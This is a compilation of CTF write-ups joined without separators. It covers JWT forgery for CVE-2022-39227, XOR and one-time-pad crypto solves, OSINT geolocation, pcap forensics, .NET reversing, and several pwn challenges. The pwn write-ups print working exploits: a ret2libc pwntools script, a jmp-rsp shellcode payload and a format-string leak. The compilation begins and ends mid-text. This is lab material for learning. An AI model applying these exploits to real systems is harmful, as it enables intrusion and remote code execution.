url = f"http://{ip}:{port}//api/v1" # Bypass proxy rule def get_ticket(s): req = s.get(url + "/get_ticket") s.headers.update({'Authorization': (req.json())['ticket: ']}) return req.text def chat(s, id): req = s.get(url + f"/chat/{id}") return req.text def flag(s): """ CVE-2022-39227 """ token = s.headers['Authorization'] [header, payload, signature] = token.split(".") parsed_payload = loads(base64url_decode(payload)) parsed_payload['role'] = 'administrator' fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':')))) new_payload = '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}' s.headers.update({'Authorization' : new_payload}) req = s.get(url + "/flag") return req.text if __name__ == "__main__": s = requests.Session() get_ticket(s) print(flag(s))``` The flag is: ```HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}```
I'm a known repeat offender when it comes to bad encryption habits. But the secrets module is secure, so you'll never be able to guess my key! Author: SteakEnthusiast [flag.enc](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/UofT-CTF-2024/flag.enc) [gen.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/UofT-CTF-2024/gen.py) --- We're given the ciphertext and a source file for the encryption. Here's `gen.py`: ```pyimport osimport secrets flag = "REDACATED"xor_key = secrets.token_bytes(8) def xor(message, key): return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) encrypted_flag = xor(flag.encode(), xor_key).hex() with open("flag.enc", "w") as f: f.write("Flag: "+encrypted_flag)``` Seems like a very standard XOR encryption. Conveniently, the key length is 8 bytes. This is crucial because we actually know the first 8 bytes of the flag, i.e. `uoftctf{`. Therefore, since XOR is a reversible function, we can relatively easily get the flag. See below: $$First\; 8\; bytes\; of\; ciphertext\; = ct[:8] = key \oplus \text{"uoftctf\{"}$$ $$ct[:8] \oplus \text{"uoftctf\{"} = key \oplus \text{"uoftctf\{"} \oplus \text{"uoftctf\{"}$$ $$ct[:8] \oplus \text{"uoftctf\{"} = key$$ Therefore, we can easily get the key and decrypt the flag! Here's the short implementation: ```pyfrom binascii import unhexlifyfrom Crypto.Util.strxor import strxor ct = unhexlify("982a9290d6d4bf88957586bbdcda8681de33c796c691bb9fde1a83d582c886988375838aead0e8c7dc2bc3d7cd97a4")key = strxor(ct[:8], b'uoftctf{') def xor(message, key): return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) flag = xor(ct, key)print(flag)``` Run the script to get the flag! uoftctf{x0r_iz_r3v3rs1bl3_w17h_kn0wn_p141n73x7}
Since the flag starts with `texsaw`, we can deduce that the first 6 numbers correspond with [116, 101, 120, 115, 97, 119]. With 6 data points we can set up a polynomial of degree 5 to fit the first 6 numbers. `ax^5 + bx^4 + cx^3 + dx^2 + ex + f = res`. 116^5a + 116^4b + 116^3c + 116^2d + 116e + f = 1014193795365553418101^5a + 101^4b + 101^3c + 101^2d + 101e + f = 507858563019110228120^5a + 120^4b + 120^3c + 120^2d + 120e + f = 1201348919167710110115^5a + 115^4b + 115^3c + 115^2d + 115e + f = 97126554923201247097^5a + 97^4b + 97^3c + 97^2d + 97e + f = 415042311506972496119^5a + 119^4b + 119^3c + 119^2d + 119e + f = 1152164036977568522 We then can use quickmath to compute system of equations to solve for the six variables. We found that a = 48066976, b = 24705178, c = 95573334, d = 50141857, e = 28353433, f = 88125350 Finally, we can write a python code to recover the rest of Xs values for each element x in ciphertext array: for i from 0 to 255: res -> ax^5 + bx^4 + cx^3 + dx^2 + ex + f if res = x add to flag The flag comes out to be `texsaw{Ju5t_Som3_B45ic_M4th}`
## **The Thought Process** The target program is simple: First, you are prompted for your order. Your order is then repeated back to you (exactly, character-for-character) and you are prompted to enter your payment information. The binary is available for us to download and run tests on our local machine. Our input for the first prompt being echoed back to us is a suggestion that there may be a format string vulnerability in the print statement following the first input; our input is repeated back to us. Inputting a bunch of format specifiers (such as `%p %p %p`) confirms our suspicion as the program spits out a bunch of random hex values, one of which looks like a code address! Additionally, the program seems to be susceptible to buffer overflows. We figure this out by spamming a ton of characters for our input and getting a segmentation fault when running the binary locally. We can find exactly how many bytes are needed to overwrite the buffer by spamming "AAAABBBBCCCCDDDD...ZZZZ" and seeing what the program tries to jump to. For instance, if we segfault at address 0x48484848, the "HHHH" in our spam overwrote the return address. Lastly, the binary is compiled with PIE (Position Independent Executable) as the description suggests. This means that code addresses are randomized on every execution of the program. So with all these facts laid out - how can we get the flag? Opening the binary in gdb and running `info func` reveals a tasty-looking function: `secretMenu`. We most likely have to overwrite the return address of the `runRestaurant` function with the address of `secretMenu` using the buffer overflow vulnerability. Because the binary was compiled with PIE, the address of `secretMenu` changes on every run! Fortunately, we can use the format string vulnerability linked to the first input to leak a code address, which we can then use to calculate the address of `secretMenu`. We end up discovering that the address leaked by `%3$p` is -0xcf bytes away from `secretMenu`, so we can overwrite the return address of `runRestaurant` with the address of `leak+0xcf`. ## **The Payload**The Order: `%3$p` - This will leak a code address to be used to calculate the address of `secretMenu`. The Payment: `AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWW[secretMenuAddr]` If we found the address of `secretMenu` to be 0x56551234 for example, we replace `[secretMenuAddr]` with a byte string `\x34\x12\x55\x56`. `pwntools` is a useful python library for connecting to remote servers using netcat, reading what the remote server prints, and sending payloads.
**WolvCTF 2024 - WOLPHV III: p1nesh4dow48**> Category: OSINT> > Description: Locate p1nesh4dow48's home coordinates and submit them as wctf{x.xxx,x.xxx} rou[n]ded>For example, if the location was the BBB at the Unviersity of Michigan the flag would be wctf{42.293,-83.717}>You have 10 tries to get the location. If you are sure you have location but the flag does not work, make a ticket>NOTE: Wolphv's twitter/X account and https://wolphv.chal.wolvsec.org/ are out of scope for all these challenges. Any flags found from these are not a part of these challenges. Background: In WOLPHVII, we found a discord link to the WOLPHV server by searching up a tab that was left in one of their Facebook advertisements. In the server, p1nesh4dow48 shares a picture of his apartment to his server. ![apt.jpg](https://i.postimg.cc/0QK9pHKS/apt.jpg) Approach: Since this CTF is hosted at the University of Michigan (and WOLPHV is based in Michigan). I assumed that the apartment was going to be somewhere in Michigan. In the photo we see "PINE RIDGE VISITOR PARKING ONLY", which would mean that the apartment's name is probably Pine Ridge. I searched up Pine Ridge apartments on Google Maps and started seaching around Ann Arbor. In hindsight, this was a mistake and cost me a lot of valuable time. I should have extended the search area to the entire state rather than just Southeastern and Southwestern Michigan. ![Screenshot-from-2024-03-24-22-23-47.png](https://i.postimg.cc/QC0ssLRR/Screenshot-from-2024-03-24-22-23-47.png) None of the apartments with pins had the same features that the apartment in the photo had. Pine Ridge Estates in Ann Arbor only had condominums and all the ones in the Detroit Metro were 1-3 stories tall, not tall like the buildings in the photo. I decided to expand my search to other parts of the state. There came up a Pine Ridge Apartments in Grand Rapids, which had similar deficiencies to the previous photos. Running out of options, I decided to search up Pine Ridge Apartments on Google Images. ![Screenshot-from-2024-03-24-22-31-53.png](https://i.postimg.cc/BZDMzcxB/Screenshot-from-2024-03-24-22-31-53.png) There was an article from upmatters.com; a news website for the Upper Peninsula, about a Pine Ridge apartment building being set on fire that looked a lot like the photo from the CTF. The article said that the apartments were in Marquette, so I searched up "Pine Ridge Apartments Marquette" and looked at Google Street View. After taking a "walk down the block", I found the location where the photo was taken. ![Screenshot-from-2024-03-24-22-39-50.png](https://i.postimg.cc/5y3vV09b/Screenshot-from-2024-03-24-22-39-50.png) One lesson I learned is to try to limit Google's location search influence because that might be limiting your search. Flag: wctf{46.546,-87.389} -Remark: we were the 3rd team overall and 1st UMich based team to capture this flag, pictured below (disc0dancers).![Screenshot-from-2024-03-24-22-36-26.png](https://i.postimg.cc/kXS3fb50/Screenshot-from-2024-03-24-22-36-26.png)
# CRYPTO: wickedsolver: [L3d](https://github.com/imL3d) writeup-writer: [L3d](https://github.com/imL3d) **Description:**>The dev team implemented their own crypto that's supposed to be perfect. Like super perfect. But there's no way they did it right... They gave me some ciphertext to try to decrypt. Can you help me? **files (copy):** [ciphertext.txt](https://github.com/C0d3-Bre4k3rs/CyberCooperative2023-writeups/blob/main/wicked/files/ciphertext.txt) In this challenge we received 7 lines of encrypted text that we need to extract the flag from.## Solution?️In order to solve this challenge, we have to take advantage of the fact that the encrypted text was encrypted multiple times via the same [OTP](https://en.wikipedia.org/wiki/One-time_pad). Essentially, when an OTP is reused we can decipher it and using an existing part of the original messages we can start decrypting the messages (read more about this vulnerability [here](https://crypto.stackexchange.com/questions/59/taking-advantage-of-one-time-pad-key-reuse)). When implementing this in python3: ```pythonword = 'wicked'word_hex = ''.join([hex(ord(c))[2:] for c in word])word_int = int(word_hex, 16) # xor two lines from the original chiphertext and store it in xored.txtwith open('xored.txt', 'r') as f: for line in f: for hex_str in [line[i:i+len(word_hex)] for i in range(len(line) - len(word_hex) + 1)]: new_hex = hex(int(hex_str, 16) ^ word_int)[2:] try: print(bytearray.fromhex(new_hex).decode()) except Exception: pass``` For example, when xor-ing the two last chiphertexts we receive: ```Blew uro⌂.t4qu&z5\```From this we can see that we found the word wicked was included at the start of one of those encrypted lines. From here we can start to guess the rest of the line while trying to decrypt the lines with each other. At the end we find that the text is from the ["Wizard of Oz"](https://www.cs.cmu.edu/~rgs/oz-12.html).The key that was used to encrypt the text was:`466c61677b77686572655f6172655f656c70686562615f616e645f676c696e64615f695f74686f756768745f746869735f7761735f`which translates to: `Flag{where_are_elpheba_and_glinda_i_thought_this_was_wicked}` ---This challenge was pretty guessy, but I still enjoyed it very much as it taught me more about OTPs and the process of reaching the solution on these types of guessy challenges. Sometimes the solution for these crypto challenges isn't clear from the start, and sometimes we don't have even a clue. In that situation, experience really helps (for example here I started analyzing the hex as bytes of a files, but then I noticed the line breaks which wouldn't be usual if it was part of a hex dump for example). Another tip is to try, try, and try more. You have an idea of what it can be? Don't be afraid to write an POC for it even if you are only 50% sure it will work. How else will you know? And the last thing is to consult your teammates (if you have some?), and to try and be creative to look for other ways to tackle the challenge. ![drake-otp](https://github.com/C0d3-Bre4k3rs/CyberCooperative2023-writeups/raw/main/wicked/images/drakeotp.png?raw=true)
## Recovery [easy] ### Description `We are The Profits. During a hacking battle our infrastructure was compromised as were the private keys to our Bitcoin wallet that we kept.We managed to track the hacker and were able to get some SSH credentials into one of his personal cloud instances, can you try to recover my Bitcoins?Username: satoshiPassword: L4mb0Pr0j3ctNOTE: Network is regtest, check connection info in the handler first.` ### Initial AnalysisI was provided with an IP with three ports. For the last port, I connected to the server using Netcat and was provided with additional information. ```bash$ nc 83.136.250.103 42153 Hello fella, help us recover our bitcoins before it's too late.Return our Bitcoins to the following address: bcrt1qd5hv0fh6ddu6nkhzkk8q6v3hj22yg268wytgwjCONNECTION INFO: - Network: regtest - Electrum server to connect to blockchain: 0.0.0.0:50002:t NOTE: These options might be useful while connecting to the wallet, e.g --regtest --oneserver -s 0.0.0.0:50002:tHacker wallet must have 0 balance to earn your flag. We want back them all. Options:1) Get flag2) Quit ```I need to transfer the stolen Bitcoins contained in the attacker Electrum wallet back to the provided Bitcoin wallet. ### SolutionTo access the attacker wallet, I used the credentials provided in the challenge description to set up a remote port forward for port 50002 from my workstation to the attacker's server with one of the other provided IP and ports. ```bash$ ssh -p 57644 -L 50002:127.0.0.1:50002 [email protected][email protected]'s password: <L4mb0Pr0j3ct>Linux ng-team-18335-blockchainrecoveryca2024-twdo6-665fbf6cb6-dd26f 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64 The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Thu Mar 14 15:01:40 2024 from 10.30.13.14satoshi@ng-team-18335-blockchainrecoveryca2024-twdo6-665fbf6cb6-dd26f ➜ ~ ``` Looking in the `satoshi` user's home directory, there's a directory called `wallet` with the `electrum-wallet-seed.txt` file which contains the seed phrase for the attacker's Electrum wallet. ```bashsatoshi@ng-team-18335-blockchainrecoveryca2024-twdo6-665fbf6cb6-dd26f ➜ ~ cat wallet/electrum-wallet-seed.txt chapter upper thing jewel merry hammer glass answer machine tag escape fitness``` With this seed phrase, I installed Electrum on my workstation, connected to the the attacker's Electrum server over my SSH tunnel, and created a new default, standard local wallet with the attacker's seed phrase and connected to the attacker's wallet in the Electrum app to transfer the Bitcoins back to the provided wallet. ```bashelectrum --regtest --oneserver -s 127.0.0.1:50002:telectrum --regtest --oneserver -s 127.0.0.1:50002:t``` ![Screenshot 2024-03-14 at 11.15.36.png](https://0x1uke.com/content/images/2024/03/Screenshot-2024-03-14-at-11.15.36.png) ![Screenshot 2024-03-14 at 11.16.06.png](https://0x1uke.com/content/images/2024/03/Screenshot-2024-03-14-at-11.16.06.png) ![Screenshot 2024-03-14 at 11.17.08.png](https://0x1uke.com/content/images/2024/03/Screenshot-2024-03-14-at-11.17.08.png) ![Screenshot 2024-03-14 at 11.17.38.png](https://0x1uke.com/content/images/2024/03/Screenshot-2024-03-14-at-11.17.38.png) The Bitcoins were returned to the provided wallet, the attacker wallet balance was zero, and I could now acquire the flag. ```bash$ nc 83.136.250.103 42153Hello fella, help us recover our bitcoins before it's too late.Return our Bitcoins to the following address: bcrt1qd5hv0fh6ddu6nkhzkk8q6v3hj22yg268wytgwjCONNECTION INFO: - Network: regtest - Electrum server to connect to blockchain: 0.0.0.0:50002:t NOTE: These options might be useful while connecting to the wallet, e.g --regtest --oneserver -s 0.0.0.0:50002:tHacker wallet must have 0 balance to earn your flag. We want back them all. Options:1) Get flag2) QuitEnter your choice: 1HTB{n0t_y0ur_k3ys_n0t_y0ur_c01n5}```
# Pet Companion ## Description > Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.>> [Attached file](https://github.com/JOvenOven/ctf-writeups/tree/main/Cyber_Apocalypse_2024_Hacker_Royale/pwn/pet_companion/challenge) Tags: _Pwn_ \Difficulty: _easy_ \Points: _300_ ## Recognition phase Running the usual exploratory commands: ```$ file pet_companionpet_companion: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=09278a4ec751302c94acb15b561c1a2f4ca2182f, not stripped``````$ checksec pet_companion [*] '/home/jovenoven/Downloads/ctf/cyberApocalypse2024_HTB/pwn/pet_companion/pet_companion' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) RUNPATH: b'./glibc/'``` Note that ``Stack Canaries`` and ``PIE`` are disabled so we can potentially leverage a ``Stack Buffer Overflow`` easily and leak addresses statically from within the `ELF` file. ```c/* decompilation from Ghidra */undefined8 main(void) { undefined8 local_48; undefined8 local_40; undefined8 local_38; undefined8 local_30; undefined8 local_28; undefined8 local_20; undefined8 local_18; undefined8 local_10; setup(); local_48 = 0; local_40 = 0; local_38 = 0; local_30 = 0; local_28 = 0; local_20 = 0; local_18 = 0; local_10 = 0; write(1,"\n[!] Set your pet companion\'s current status: ",0x2e); read(0,&local_48,0x100); write(1,"\n[*] Configuring...\n\n",0x15); return 0;}``` ## Finding the bug Basically the program reads up to `0x100` bytes from the user input and stores it in an 8 bytes sized variable, so there is notably a `Buffer Overflow` bug, we can corroborate that by running the program and inserting a large string: ```$ ./pet_companion [!] Set your pet companion's current status: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [*] Configuring... Segmentation fault``` ## Exploitation phase At this point, with a Buffer Overflow (BOF) and Position Independent Executable (PIE) disabled, we can execute any function available inside the binary or in the Global Offset Table (GOT PLT). Unfortunately, in this challenge, we don't have a function that prints the flag or gives us a shell, so this time we have to be a bit more clever. The only potentially useful function that we have is ``write()``. With ``write()``, we can read any value from within the binary. This is especially useful because we could leak a ``libc`` function address from the ``GOT PLT`` and calculate the ``libc`` base address with that. Having a ``libc`` base address leak gives us a lot of power because we can call any function and gadget inside ``libc``. For example, we could call ``system(/bin/sh)`` or a ``One Gadget`` to spawn a shell. So the plan is to use the buffer overflow bug to call ``write()`` and leak the ``libc`` address, then call ``main()`` again to be able to do another buffer overflow. But this time, we will have all libc functions and one gadgets at our disposal. To achieve our goal, we need to start calculating the offset of our buffer overflow. I will use ``cyclic`` from within ``pwndgb`` for this task. ```$ gdb pet_companion GNU gdb (Debian 13.2-1) 13.2 ... pwndbg> cyclic 100aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaapwndbg> rStarting program: /home/jovenoven/... [!] Set your pet companion's current status: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa [*] Configuring... Program received signal SIGSEGV, Segmentation fault.0x00000000004006df in main () ... ──────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────── ► 0x4006df <main+149> ret <0x616161616161616a> ... pwndbg> cyclic -l 0x616161616161616aFinding cyclic pattern of 8 bytes: b'jaaaaaaa' (hex: 0x6a61616161616161)Found at offset 72``` Before being able to call ``write()``, we have to find a gadget to set the register ``RSI`` with the address of ``write()`` in the ``GOT`` section, which will be treated as the first parameter of the function. I used ``ropper`` for the task. ```$ ropper --file pet_companion [INFO] Load gadgets from cache[LOAD] loading... 100%[LOAD] removing double gadgets... 100% Gadgets=======... 0x0000000000400741: pop rsi; pop r15; ret; ... 93 gadgets found``` That is the unique ``pop rsi`` gadget that ``ropper`` found, it comes with a ``pop r15`` so we will just put garbage in that register since we don't need it. For the last part of our exploit I will use the `one_gadget` tool to find a `One Gadget`: ```$ one_gadget $(ldd pet_companion | grep libc.so | cut -d' ' -f3) 0x4f2a5 execve("/bin/sh", rsp+0x40, environ)constraints: rsp & 0xf == 0 rcx == NULL 0x4f302 execve("/bin/sh", rsp+0x40, environ)constraints: [rsp+0x40] == NULL 0x10a2fc execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL``` With all this information we can now write our final exploit. ```Python#!/usr/bin/python3from pwn import * # Set up the target binary by specifying the ELF fileelf = context.binary = ELF("pet_companion")libc = ELF(elf.runpath + b"/libc.so.6") # Defining the GDB script that will be used when running the binary with the GDB parametergs = '''continue'''# Launch the binary with GDB, without GDB or REMOTE based on the command-line argumentsdef start(): if args.REMOTE: return remote("94.237.53.58", 49979) else: if args.GDB: return gdb.debug(elf.path, gdbscript=gs) else: return process(elf.path) io = start() #============================================================# EXPLOIT GOES HERE#============================================================ #=-=-=- USE BOF TO LEAK LIBC -=-=-= pop_rsi_r15 = 0x400741 # Set the first argument of the write function in register RSI# as the address of the same write function to leak its address,# set R15 to any value, then call write function and finally# call main to use BOF again laterpayload = b"A"*72 + \ p64(pop_rsi_r15) + p64(elf.got.write) + p64(0x0) + \ p64(elf.plt.write) + \ p64(elf.sym.main)io.sendlineafter(b": ", payload)data = io.recvuntil(b'[!] Set your pet companion\'s current status: ') # Extract the write address from the response and calculate the# libc base address by subtracting the write function offset# to the leaked addresslibc.address = u64(data[21:29]) - libc.sym.writeinfo("libc @ 0x%x", libc.address) #=-=-=- USE BOF AGAIN TO DO A RET2LIBC ATTACK -=-=-= # Call a one gadget from libcio.sendline(b"A"*72 + p64(libc.address + 0x4f302)) #============================================================ # Interact with the processio.interactive()``` Run the exploit with the ``REMOTE`` option to get the real flag. Don't forget to change the ip address and port of your docker container in the exploit script. ```$ ./xpl.py REMOTE ... [+] Opening connection to 94.237.63.235 on port 49131: Done[*] libc @ 0x7ff7119cd000[*] Switching to interactive mode [*] Configuring... $ lsflag.txtglibcpet_companion$ cat flag.txtHTB{c0nf1gur3_w3r_d0g}``` \Flag `HTB{c0nf1gur3_w3r_d0g}`
Bruteforce online password cracking with username = `john` using hydra with password list rockyou.txt. The correct password is `P@ssw0rd`. The flag is `texsaw{brut3_f0rce_p@ssword!}`
# Eternally Pwned: Infiltration > Author: dree_ > Description: I recently had my passwords and other sensitive data leaked, but I have no idea how. Can you figure out how the attacker got in to my PC? [network-capture.pcap](https://github.com/nopedawn/CTF/blob/main/WolvCTF24/Infiltration/network-capture.pcap) Given the forensics challenge, we need to investigate data for evidence of network packet capture `network-capture.png` We can investigate with Wireshark and analyze the every packet bytes, if we filter the most interraction is on `tcp` protocol & `smb` protocol. Both we're gonna focusing on (`tcp` / `smb`) packet interraction. If we filter the packet in number `446` & `550` ![packet-no-446.png](https://raw.githubusercontent.com/nopedawn/CTF/main/WolvCTF24/Infiltration/packet-no-446.png) ![packet-no-550.png](https://raw.githubusercontent.com/nopedawn/CTF/main/WolvCTF24/Infiltration/packet-no-550.png) or filter `tcp.stream eq 4` (both are same filtering) ![packet-view.png](https://raw.githubusercontent.com/nopedawn/CTF/main/WolvCTF24/Infiltration/packet-view.png) We can see the bunch of "A" characters, and if wee look closely there's look like a base64 string between the "A" characters Note that we have found these, next we can grep the base64 string or using tshark ```bash$ tshark -r network-capture.pcap -Y "frame.number == 446" -x0000 00 0c 29 ce 19 19 00 0c 29 95 a9 e6 08 00 45 00 ..).....).....E.0010 00 6d bc 93 40 00 40 06 f5 95 c0 a8 03 85 c0 a8 .m..@.@.........0020 03 8c b6 f1 01 bd 3f d8 46 5d d3 e1 93 41 80 18 ......?.F]...A..0030 00 f9 b7 6e 00 00 01 01 08 0a 48 40 d9 94 00 00 ...n......H@....0040 72 c3 00 00 00 35 ff 53 4d 42 2b 00 00 00 00 18 r....5.SMB+.....0050 01 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .`..............0060 00 00 00 08 00 00 01 01 00 10 00 64 32 4e 30 5a ...........d2N0Z0070 6e 74 73 4d 33 52 54 58 77 3d 3d ntsM3RTXw== $ echo "d2N0ZntsM3RTXw==" | base64 -dwctf{l3tS_``` We've got the first part `wctf{l3tS_` ```bash$ tshark -r network-capture.pcap -Y "frame.number == 550" -x 0d20 41 41 41 41 4d 33 52 6c 55 6d 34 30 62 45 78 35 AAAAM3RlUm40bEx50d30 58 32 63 77 58 77 3d 3d 41 41 41 41 41 41 41 41 X2cwXw==AAAAAAAA 0f20 41 41 41 41 41 41 41 41 41 41 41 41 59 6b 78 56 AAAAAAAAAAAAYkxV0f30 4d 31 38 33 62 6a 6c 33 62 54 52 70 56 32 35 4d M183bjl3bTRpV25M0f40 66 51 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 fQ==AAAAAAAAAAAA $ echo "M3RlUm40bEx5X2cwXw==" | base64 -d3teRn4lLy_g0_ $ echo "YkxVM183bjl3bTRpV25MfQ==" | base64 -dbLU3_7n9wm4iWnL}``` then the two last part `3teRn4lLy_g0_` & `bLU3_7n9wm4iWnL}` > Flag: `wctf{l3tS_3teRn4lLy_g0_bLU3_7n9wm4iWnL}`
**First thing i did was opening the binary in GhidraAnd there was only these two useful functions :** **Vuln :**``` undefined vuln() undefined AL:1 <RETURN> undefined1[32] Stack[-0x28] Buffer XREF[1]: 00401196(*) vuln XREF[4]: Entry Point(*), main:00401215(c), 004020b4, 00402158(*) 00401176 f3 0f 1e fa ENDBR64 0040117a 55 PUSH RBP 0040117b 48 89 e5 MOV RBP,RSP 0040117e 48 83 ec 20 SUB RSP,0x20 00401182 48 8d 05 LEA RAX,[s_The_hard_part_is_not_finding_the_004020 = "The hard part is not finding 7f 0e 00 00 00401189 48 89 c7 MOV RDI=>s_The_hard_part_is_not_finding_the_004020 = "The hard part is not finding 0040118c b8 00 00 MOV EAX,0x0 00 00 00401191 e8 ca fe CALL <EXTERNAL>::printf int printf(char * __format, ...) ff ff 00401196 48 8d 45 e0 LEA RAX=>Buffer,[RBP + -0x20] 0040119a 48 89 c7 MOV RDI,RAX 0040119d b8 00 00 MOV EAX,0x0 00 00 004011a2 e8 c9 fe CALL <EXTERNAL>::gets char * gets(char * __s) ff ff 004011a7 b8 00 00 MOV EAX,0x0 00 00 004011ac c9 LEAVE 004011ad c3 RET ``` **We observe a vulnerability in the function due to a lack of input validation. The program accepts user input without verifying its length, storing it in a fixed-size buffer of 32 bytes. This oversight creates a buffer overflow vulnerability, wherein input exceeding the buffer size can overwrite adjacent memory locations, leading to potential exploitation and compromising program integrity.now lets take a look at the gift function :** ``` undefined gift() undefined AL:1 <RETURN> undefined2 Stack[-0xa]:2 local_a XREF[1]: 0040122d(W) gift XREF[3]: Entry Point(*), 004020c4, 00402198(*) 00401221 f3 0f 1e fa ENDBR64 00401225 55 PUSH RBP 00401226 48 89 e5 MOV RBP,RSP 00401229 48 83 ec 10 SUB RSP,0x10 0040122d 66 c7 45 MOV word ptr [RBP + local_a],0xe4ff fe ff e4 00401233 48 8d 05 LEA RAX,[s_Just_two_bytes,_hanging_out_toge_004020 = "Just two bytes, hanging out t 26 0e 00 00 0040123a 48 89 c7 MOV RDI=>s_Just_two_bytes,_hanging_out_toge_004020 = "Just two bytes, hanging out t 0040123d b8 00 00 MOV EAX,0x0 00 00 00401242 e8 19 fe CALL <EXTERNAL>::printf int printf(char * __format, ...) ff ff 00401247 b8 ff ff MOV EAX,0xffffffff ff ff 0040124c c9 LEAVE 0040124d c3 RET ```so there is nothing useful in this function like you might be used to in easier challenges, so we need to find a way to exploit this binary and find a way to get our flag, so i check checksec and i found that the nx is disabled , so we can manage to get our shellcode to execute , used the tool "Ropper" to check if there is any jmp rsp instructions in the binary so i can use it to inject a shellcode and it was there :) ```ropper --file ./RunningOnPrayers --search "jmp rsp"[INFO] Load gadgets from cache[LOAD] loading... 100%[LOAD] removing double gadgets... 100%[INFO] Searching for gadgets: jmp rsp [INFO] File: ./RunningOnPrayers0x0000000000401231: jmp rsp;```and i got the address of the gift function which was : *0x401221* so now im ready to make my exploit after some debugging and checking how the binary going to handle my inputand its going to work like this * 32 NOPS to overwrite registers till we get to the RIP Register * writing the address of the gift function to the RIP so we can make our return* then in the gift function we gonna overwrite the register again with the jump instruction address so we can make our jump to RSP* and then fill the RSP with our shell codeHere's my Exploit :) ```#!/usr/bin/env python3import sysimport argparseimport iofrom pwn import *context.log_level = 'debug' exe = context.binary = ELF(args.EXE or './RunningOnPrayers') def start_local(args, argv=[], *a, **kw): if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) def start_remote(host, port, argv=[], *a, **kw): return remote(host, port) gdbscript = '''tbreak maincontinue'''.format(**locals()) parser = argparse.ArgumentParser(description='Exploit script')parser.add_argument('mode', choices=['local', 'remote'], help='Mode: local or remote')parser.add_argument('--GDB', action='store_true', help='Enable GDB debugging')parser.add_argument('host', nargs='?', default='localhost', help='Remote host')parser.add_argument('port', nargs='?', type=int, default=1337, help='Remote port')args = parser.parse_args() if args.mode == 'local': start_func = lambda: start_local(args)else: start_func = lambda: start_remote(args.host, args.port)p = b'\x90'*32 + p64(0x401221) + p64(0x401231) + asm(shellcraft.amd64.linux.sh())io = start_func()io.sendline(p)io.interactive()```
### The Thought ProcessWe are given a segment of an MFT (Master File Table). We probably know that the MFT is part of a filesystem (most likely, Windows NTFS) but not much more. A quick Google search for MFT reveals that it is a structure that stores the metadata for files in the filesystem, as well as data or pointers to data. File names are part of metadata, and the description of the challenge tells us that we want to extract the file names from this MFT segment. So, we should research the structure of an MFT. Collecting information from a few search results about the MFT structure (primarily from [here](https://www.futurelearn.com/info/courses/introduction-to-malware-investigations/0/steps/146529)) tells us:* Each entry is 0x400 bytes large, starting with "FILE" as the header* The attributes of each entry begin at offset 0x38* Each attribute header starts with its type at offset 0x0, and length at offset 0x4.* We want the File Name attribute, which is type 0x30. Next, we want to research the structure of the file name attribute specifically, which we can find information about [here](https://www.futurelearn.com/info/courses/introduction-to-malware-investigations/0/steps/147114). So, we now have the basic information necessary to parse the file names of every entry in the MFT segment. ### The SolutionExtract the file names of every file in the MFT and place them into an array of some kind. All of the relevant ones are exactly one character long. Using the list of indices provided in the challenge description, concatenate each corresponding element of your array into the flag.
# EPT1911**Author: LOLASL** **Description:** Finally found a working keygen, I think. **Password:** ept1911 --- ## Solve**By TagePical** ### Ept 1911 – Writeup First, for solving this task, I downloaded ilspy, which is a .NET assembly browser and decompiler. It is an extension in vscode. In the function `LegitStuff_Loader` I noticed a string variable “text” which was equal to “EPT{“. That might be a good start. ![LegitStuff Loader Function](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Reversing/EPT1911/munintrollet/legitstuff_loader.png) In this part of the code, it seems like it is making an enumerator, and getting it from `encpw` within settings. It is also running a while loop, while the enumerator can move to the next input. Next, it is parsing `current`, which is taken from the enumerator, with `text`, which is “EPT{“, and adding 42. ![Enumerator Code](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Reversing/EPT1911/munintrollet/enumerator.png) In the file `encpw`, we find this line of code: ![encpw](encpw.png) Isolating the numbers from the `encpw` file gives us: 58, 7, 58, 53, 43, 53, 65, 68, 6, 77, 53, 72, 48, 72, 7, 15, 7, 7, 53, 40, 53, 68, 6, 72, 77, 9, 61, 63, 55, 68, 21. Putting these numbers into the line of code `text += (char)(int.Parse(current) + 42);` results in the following string: `EPT{d1d_U_kn0w_rZr1911_R_n0rw3gian?` ![Almost Complete Flag](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Reversing/EPT1911/munintrollet/almsotflag.png) However, this is not the complete flag, as we are still missing a “}”. So, I continued searching through the code for a similar pattern. In the bottom of the file on the first page, I found that the 